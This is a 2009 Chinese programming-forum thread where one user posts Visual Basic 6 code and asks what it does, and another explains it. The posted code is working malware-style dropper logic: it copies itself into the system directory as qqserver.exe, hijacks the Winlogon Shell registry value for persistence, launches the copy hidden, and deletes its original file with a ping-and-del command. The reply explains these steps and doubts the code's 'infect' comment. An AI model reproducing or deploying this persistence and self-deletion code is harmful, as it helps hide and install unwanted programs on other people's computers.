ok100fen 发表于 2009-7-10 13:42:46

【求助】马兄,帮我注释这段代码吧,谢谢啦

<div style="FONT-SIZE: 12px">这段代码困扰我很长时间,帮忙注释一下<br/>谢谢啦<br/>特别是这句:<br/>If InStr(StrConv(FileArray, vbUnicode), "|*|") &lt;= 0 Then<br/>这里面的文件是自己写的这个文件还是qqserer.exe?<br/>谢谢你了<br/><br/><br/>Private Declare Function GetModuleFileName Lib _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;"kernel32" Alias "GetModuleFileNameA" ( _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;ByVal hModule As Long, _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;ByVal lpFileName As String, ByVal nSize As Long) As Long<br/>Private Declare Function GetSystemDirectory Lib _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;"kernel32" Alias "GetSystemDirectoryA" ( _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;ByVal lpBuffer As String, _<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;ByVal nSize As Long) As Long<br/><br/>Private Sub Form_Load()<br/>On Error Resume Next<br/>&nbsp; &nbsp; Dim FileArray() As Byte, SplitLine() As String, ExePath As String<br/><br/>&nbsp; &nbsp; Open GetMyFileName For Binary Access Read As #1 '读取要感染的问件内容<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;ReDim FileArray(FileLen(GetMyFileName) - 1)<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Get #1, , FileArray<br/>&nbsp; &nbsp; Close #1<br/>&nbsp; &nbsp; <br/>&nbsp; &nbsp; ExePath = GetSystemPath &amp; "\qqserver.exe"<br/>&nbsp; &nbsp; If InStr(StrConv(FileArray, vbUnicode), "|*|") &lt;= 0 Then<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;End<br/>&nbsp; &nbsp; ElseIf Fso.FileExists(ExePath) = False Then<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe " &amp; ExePath, "REG_SZ"<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Fso.CopyFile GetMyFileName, ExePath, False<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Shell ExePath, 0<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Shell "cmd /c ping 127.0.0.1&amp;&amp;del /f /q /a:- " &amp; """" &amp; GetMyFileName &amp; """", 0 '首次运行删除自身<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;End<br/>&nbsp; &nbsp; End If<br/>End Sub<br/><br/>Private Function GetMyFileName() As String<br/>On Error Resume Next<br/>&nbsp; &nbsp; Dim tmp As String * 255<br/>&nbsp; &nbsp; GetMyFileName = Mid(tmp, 1, GetModuleFileName(0, tmp, 255))<br/>End Function<br/><br/>Private Function GetSystemPath() As String<br/>On Error Resume Next<br/>&nbsp; &nbsp; Dim SystemPath As String<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;SystemPath = String(255, Chr(0))<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;GetSystemDirectory SystemPath, 254<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;SystemPath = Left(SystemPath, InStr(SystemPath, Chr(0)) - 1)<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;GetSystemPath = SystemPath<br/>End Function</div><br/><br/>

马大哈 发表于 2009-11-7 04:17:27

<p>启动时先把自己的内容读入内存:</p>
<p>&nbsp;</p>
<p>&nbsp;Open GetMyFileName For Binary Access Read As #1 '读取要感染的问件内容<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;ReDim FileArray(FileLen(GetMyFileName) - 1)<br/>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Get #1, , FileArray<br/>&nbsp; &nbsp; Close #1</p>
<p>&nbsp;</p>
<p>然后再判断是否有某个关键字的存在:</p>
<p>&nbsp;</p>
<p>If InStr(StrConv(FileArray, vbUnicode), "|*|") &lt;= 0 Then</p>
<p>&nbsp;</p>
<p>如果不存在,则退出执行,否则复制一份自己到系统某处,并写入自动启动,最后将当前的自己删除.....</p>
<p>&nbsp;</p>
<p>看起来就是个在自己的尾巴里写参数的EXE,用记事本打开这个EXE应该能看到参数,标志就是|*|.</p>
<p>&nbsp;</p>
<p>至于注释里的"读取要感染的问件内容",要么是代码没贴全,感染部分没贴上来;要么这份代码的作者连什么是"感染"都不清楚....或者....他认为这是"感染系统"- -!</p>
页: [1]
查看完整版本: 【求助】马兄,帮我注释这段代码吧,谢谢啦